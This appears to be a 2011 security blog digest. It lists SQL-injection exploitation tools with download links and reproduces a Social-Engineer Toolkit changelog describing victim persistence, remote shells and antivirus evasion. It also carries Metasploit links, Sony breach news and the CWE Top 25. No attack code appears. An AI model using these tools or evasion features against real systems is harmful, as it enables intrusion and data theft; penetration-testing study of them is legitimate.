http://sqlmap.sourceforge.net/#download
Download Gui-for-sqlmap
http://code.google.com/p/gui-for-sqlmap/downloads/list
SQL Power Injector
is an application created in .Net 1.1 that helps the penetration tester to find and exploit SQL injections on a web page.
Supports: Microsoft SQL Server, Oracle, MySQL, Sybase / Adaptive Server and DB2.
Download
http://www.sqlpowerinjector.com/download.htm
Absinthe
is a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection.
Absinthe does not aid in the discovery of SQL Injection holes. This tool will only speed up the process of data recovery.
Supports: Microsoft SQL Server, MSDE, Oracle, and Postgres.
Download
http://www.0x90.org/releases/absinthe/download.php
bsqlbf-v2:
This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. Databases supported:
0. MS-SQL
1. MySQL
2. PostgreSQL
3. Oracle
Download
http://code.google.com/p/bsqlbf-v2/downloads/list
Marathon Tool
Marathon Tool is a POC for using heavy queries to perform a Time-Based Blind SQL Injection attack. This tool is still work in progress but is right now in a very good alpha version to extract information from web applications using Microsoft SQL Server, Microsoft Access, MySQL or Oracle Databases.
Download
http://marathontool.codeplex.com/#
pysqlin
Pysqlin is a console python tool to exploit SQL Injection vulnerabilities. It has 3 main adaptable components via a plugin framework:
Plugin: Adds functionality to the main program.
Injector: Provides injection methods.
Filter: Allows modification of the final HTTP request and database query in order to perform any kind of transformation.
Implemented: Oracle, MySQL and Microsoft SQL Server.
Download
http://code.google.com/p/pysqlin/source/checkout
BSQL Hacker
BSQL (Blind SQL) Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities virtually in any database
Implemented: Oracle and Microsoft SQL Server.
Available experimental support for MySQL.
Download
http://labs.portcullis.co.uk/application/bsql-hacker/
sqlsus
sqlsus is an open source MySQL injection and takeover tool, written in perl.
Supports only MySQL.
Download
http://sqlsus.sourceforge.net/download.html
DarkMySQLi16.py
SQL injection tool by rsauron, written in Python
Download
http://www.multiupload.com/NV6T2XOI1A
Source
darkc0de Crew
SQL TOOL
This is an auto SQL injection Tool. Supports MySQL & MsSQL. The Old SQL Tool will no longer be supported.
Download
http://sourceforge.net/projects/sqltool/files/SQL%20Tool.rar/download?_test=goal
mySQLenum
is a command line automatic blind sql injection tool for web application that uses MySql server as its back-end. Its main goal is to provide an easy to use command line interface.
Supports only MySQL
Download
http://sourceforge.net/projects/mysqlenum/files/mysqlenum-0.3.tar.gz/download?_test=goal
Social-Engineer Toolkit v1.5 - Fast-Track Linux
On Thursday, 30 Jun 2011, in topic 'Tools'
The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
Official change log:
Added shell.py to support both Linux and OSX for the SET Interactive Shell, uses same code repository
Added shell to support Linux/OSX for SET Interactive Shell
Added download to support Linux/OSX for SET Interactive Shell
Added upload to support Linux/OSX for SET Interactive Shell
Added ps to support Linux/OSX for SET Interactive Shell
Added kill to support Linux/OSX for SET Interactive Shell
Fixed a bug in mass mailer where TLS would execute after ehlo not before. Thanks pr1me
Changed download path to replace forward and back slashes with a _ so it would not cause strange nix issues with back slashes and forward slashes in the SET Interactive Shell
Added better integer handling when running listener.py by itself without specifying a port
Redesignated filename shell.binary to shell.windows and shell.linux (PE vs. ELF binary)
Added separate installers for shell.linux and shell.osx, too many differences between the two and needed different compiling.
Added instructions in shell.py how to compile for each flavor operating system including windows, linux, and osx
Added reboot now into the SET interactive Shell
Added persistence to the SET interactive shell with a completely custom written python-bytecompiled service. Essentially uploads service to victim, that calls interactive shell every 30 minutes
Added name distinguishing per windows/posix systems so it will show up POSIX or WINDOWS on interactive shell, will also show WINDOWSUAC-SAFE and WINDOWSSYSTEM.
Added the MS11-050 IE mshtml!CObjectElement Use After Free exploit from Metasploit
Added dynamic packing to download/upload for persistence, better AV avoidance
Added MS11-050, Adobe Flash 10.2.153.1, and Cisco AnyConnect Metasploit exploits to the SET web gui
Added ‘clear’ and ‘cls’ in the SET Interactive Menu to remove what's in the screen, etc.
When using the java docbase exploit, removed ‘Client Login’ for title frame, isn’t needed
Added back command to the SET interactive shell to go back when in different menus
Fixed a bug where it would state payloadprep not defined, it was caused by UPX not fully packing the device at time of upload, a 3 second delay has been added
To download the Social-Engineer Toolkit, type the following:
root@fortress:/pentest/exploits/# svn co http://svn.secmaniac.com/social_engineering_toolkit set/
Or you can download the tarball here:
http://www.secmaniac.com/files/set.tar.gz
To download Fast-Track, type the following:
root@fortress:/pentest/exploits/# svn co http://svn.secmaniac.com/fasttrack fasttrack/
Metasploit Framework 3.7.2 incl. Tut
On Thursday, 30 Jun 2011, in topic 'Vulnerabilities'
The Metasploit team has spent the last two months focused on one of the least-visible, but most important pieces of the Metasploit Framework; the session backend. Metasploit 3.7 represents a complete overhaul of how sessions are tracked within the framework and associated with the backend database. This release also significantly improves the staging process for the reverse_tcp stager and Meterpreter session initialization. Shell sessions now hold their output in a ring buffer, which allows us to easily view session history -- even if you don't have a database.
download page
http://www.metasploit.com/
TUT:
part1
http://www.hackersbay.in/2011/05/metasploit-basics-tutorial.html
part2
http://www.hackersbay.in/2011/06/metasploit-basics-part-2-using.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HackersBay+%28Hackers+Bay%29
part3
http://www.hackersbay.in/2011/06/metasploit-basics-part-3.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HackersBay+%28Hackers+Bay%29
Metasploit Unleashed - Online Free Security Training
Check out
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
Pentesting-with-metasploit.pdf
Download
http://www.uploadarea.de/upload/39qs2f18vkvd58mmkgb6vibpo.html
Sony Hiring Information Security Engineers & Facebook Hires George Hotz
On Thursday, 30 Jun 2011, in topic 'News'
After 14 hacks, Sony has finally opened recruitment for a "Sr Application Security Analyst". Sony estimates a 171 million dollar loss due to the PSN hack. Sony's CEO has also apologized for the PSN hack and offers data theft insurance.
Social network Facebook has hired a computer hacker who was recently sued by Sony for hacking the online game system PlayStation 3. Facebook did not reveal what 21-year-old George Hotz will do for the firm.
Hotz - also known by the alias "GeoHot" - gained notoriety in 2008 when he developed software for unlocking the iPhone and allowing it to be used on other networks. He also released instructions for the Sony PlayStation 3 that helped owners modify their consoles to run unauthorized applications and pirated games.
It's been two months since the personal details of 100 million PSN and SOE users were stolen and Sony is still dealing with the fall-out.
Top 25 Most Dangerous Software Errors
On Thursday, 30 Jun 2011, in topic 'Vulnerabilities'
The 2011 CWE/SANS Top 25 Most Dangerous Software Errors is a list of the most widespread and critical errors that can lead to serious vulnerabilities in software. They are often easy to find, and easy to exploit. They are dangerous because they will frequently allow attackers to completely take over the software, steal data, or prevent the software from working at all.
The Top 25 list is a tool for education and awareness to help programmers to prevent the kinds of vulnerabilities that plague the software industry, by identifying and avoiding all-too-common mistakes that occur before software is even shipped. Software customers can use the same list to help them to ask for more secure software. Researchers in software security can use the Top 25 to focus on a narrow but important subset of all known security weaknesses. Finally, software managers and CIOs can use the Top 25 list as a measuring stick of progress in their efforts to secure their software.
The list is the result of collaboration between the SANS Institute, MITRE, and many top software security experts in the US and Europe.
Download: PDF
http://cwe.mitre.org/top25/archive/2011/2011_cwe_sans_top25.pdf